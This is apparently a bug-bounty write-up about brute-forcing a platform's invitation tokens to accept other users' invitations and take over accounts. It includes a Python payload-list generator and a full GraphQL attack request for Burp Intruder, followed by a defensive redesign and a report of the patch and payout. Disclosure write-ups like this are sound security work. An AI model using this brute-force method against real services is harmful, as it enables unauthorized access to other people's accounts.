$500 for Cracking Invitation Code For Unauthorized Access & Account Takeover


Abhi Sharma

Hi everyone! Today, I’m excited to share a fascinating vulnerability I discovered in a platform we’ll call “ExampleSpark.” This particular security flaw allowed me to access and accept invitations meant for other users, leading to potential unauthorized access and account takeovers. Let’s dive into the details!

Understanding Target: ExampleSpark

ExampleSpark (a pseudonym for confidentiality) is a robust platform designed for team management and project collaboration. It provides comprehensive tools for managing users, projects, and permissions, making it an attractive target for exploring security vulnerabilities.

The Vulnerability:

The vulnerability I discovered is an authorization bypass that allows a low-privileged user to access and accept invitations intended for other users. This flaw can lead to unauthorized access and account takeovers if exploited effectively. Below, I’ll outline the steps to reproduce this vulnerability.

Steps to Reproduce:

Invite User:

Log in to the admin account on ExampleSpark. Navigate to the team management section. Invite a user, which generates an invitation link containing a base64-encoded token made up of the user ID and a 7-character OTP (One-Time Password).

Access from Low-Level Account:

Log in to a low-level viewer permission account on ExampleSpark.

Extract User ID and OTP:

Go to the team management section and select the invited user. Extract the user ID from the URL https://app.examplespark.com/users/User:<user_id>.

Prepare Payload Word List:

Use the extracted user ID to create a payload in the format userid:otpcode (e.g., 018dee9c-a9be-04f8-0000-fb5b23eef4d2:39426NQ). Generate a wordlist of 7-character alphanumeric combinations, convert each to base64, and create a payload list. The payload list can be generated with the Python code below:

```python
import random
import base64

def generate_otp():
    # Generate one random 7-character alphanumeric OTP candidate
    characters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return ''.join(random.choice(characters) for _ in range(7))

def convert_to_base64(data):
    # Encode the "userid:otp" string as base64, matching the invitation token format
    data_bytes = data.encode('utf-8')
    return base64.b64encode(data_bytes).decode('utf-8')

# Constant user ID (taken from the invited user's URL)
user_id = "018dee9c-a9be-04f8-0000-fb5b23eef4d2"

# Number of OTP candidates to sample
num_otps = 1000

# Generate payloads and collect them in a list
payload_list = []

for _ in range(num_otps):
    otp = generate_otp()
    payload = f"{user_id}:{otp}"
    payload_list.append(convert_to_base64(payload))

# Print the base64-encoded payloads
for i, payload in enumerate(payload_list, start=1):
    print(f"Payload {i}: {payload}")

# 'payload_list' can now be used for further processing.
```

Exploit Authorization Bypass:

Use a tool like Burp Suite’s Intruder to send a POST request to /graphql/frontend?n=AcceptInvitation with the payload list:

```http
POST /graphql/frontend?n=AcceptInvitation HTTP/2
Host: app.examplespark.com
Cookie: [session cookies]
Content-Length: 616
Sec-Ch-Ua: "Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json
Accept: */*
X-Graphql-Operation: AcceptInvitation
Sec-Ch-Ua-Platform: "Linux"
Origin: https://app.examplespark.com
Referer: https://app.examplespark.com/invitations/MDE4ZGVkZWUtZWZiZS0wNGY4LTAwMDAtN2I4YWRmZDAwYjQ1OjAxMzI2NQ

{"operationName":"AcceptInvitation","variables":{"invitation_key":"","name":"","password":""},"query":"mutation AcceptInvitation($invitation_key: String!, $name: String!, $password: String!) {\n accept_invitation(\n input: {invitation_key: $invitation_key, name: $name, password: $password}\n ) {\n account_id\n user {\n id\n status\n ...AuthUserLogin\n __typename\n }\n __typename\n }\n}\n\nfragment AuthUserLogin on User {\n id\n email\n display_name\n session_valid_until\n __typename\n}"}
```

Select the invitation_key parameter as the insertion point and start the attack.

Account Takeover:

Monitor responses for a 200 OK status with code 1142, which indicates successful acceptance of the invitation. Once the correct OTP is identified, the attacker can accept the invitation and gain unauthorized access, potentially escalating privileges depending on the invited user’s role.

Impact:

This vulnerability allows an attacker to bypass authorization mechanisms, accept invitations meant for other users, and potentially take over higher-privileged accounts. The lack of rate limiting and the predictable 7-character alphanumeric OTP, which base64 encoding does nothing to protect, make the platform susceptible to brute-force attacks.
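The weaknesses listed above (a short guessable code, no binding to the invitee, no limit on failed attempts) suggest the shape of a fix. The following is an added example and not ExampleSpark’s code; it assumes an in-memory dictionary standing in for the database, and the lockout threshold and lifetime are hypothetical values.

```python
import hashlib
import hmac
import math
import secrets
import time

# Hypothetical in-memory store standing in for the database.
INVITATIONS = {}
MAX_ATTEMPTS = 5          # failed tries per invitation before it locks
TTL_SECONDS = 72 * 3600   # invitation lifetime

def otp_entropy_bits(alphabet_size, length):
    """Entropy of a uniform random code: length * log2(alphabet_size)."""
    return length * math.log2(alphabet_size)

def create_invitation(invitee_email, now=None):
    """Issue a key 'id.secret'; only a hash of the secret is stored."""
    now = time.time() if now is None else now
    inv_id = secrets.token_urlsafe(16)
    secret = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
    INVITATIONS[inv_id] = {
        "email": invitee_email.lower(),
        "secret_hash": hashlib.sha256(secret.encode()).digest(),
        "attempts": 0, "expires": now + TTL_SECONDS, "used": False,
    }
    return f"{inv_id}.{secret}"

def accept_invitation(key, caller_email, now=None):
    """Return (ok, reason); reason is for server-side logs, not the client."""
    now = time.time() if now is None else now
    inv_id, _, secret = key.partition(".")
    inv = INVITATIONS.get(inv_id)
    if inv is None:
        return False, "unknown invitation"
    if inv["used"] or now > inv["expires"]:
        return False, "expired or already used"
    if inv["attempts"] >= MAX_ATTEMPTS:
        return False, "locked after repeated failures"
    inv["attempts"] += 1
    presented = hashlib.sha256(secret.encode()).digest()
    if not hmac.compare_digest(presented, inv["secret_hash"]):  # constant time
        return False, "secret mismatch"
    # Bind acceptance to the invitee so another account cannot consume it.
    if caller_email.lower() != inv["email"]:
        return False, "caller is not the invitee"
    inv["used"] = True
    return True, "accepted"
```

The entropy helper makes the gap concrete: 7 characters from a 36-symbol alphabet give about 36 bits, while the 32-byte secret gives 256, and the per-invitation lockout bounds how many of those guesses can ever be tried.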

Response and Resolution:

Upon reporting the issue to ExampleSpark, the security team acknowledged the severity and implemented a patch to secure the platform. They awarded me a bounty of $500, reflecting the medium severity of the vulnerability.

Takeaway:

This discovery emphasizes the importance of securing invitation mechanisms with strong, unguessable tokens and robust rate limiting to prevent brute-force attacks. Always ensure platforms are protected against such vulnerabilities to safeguard user accounts and maintain the integrity of the system.
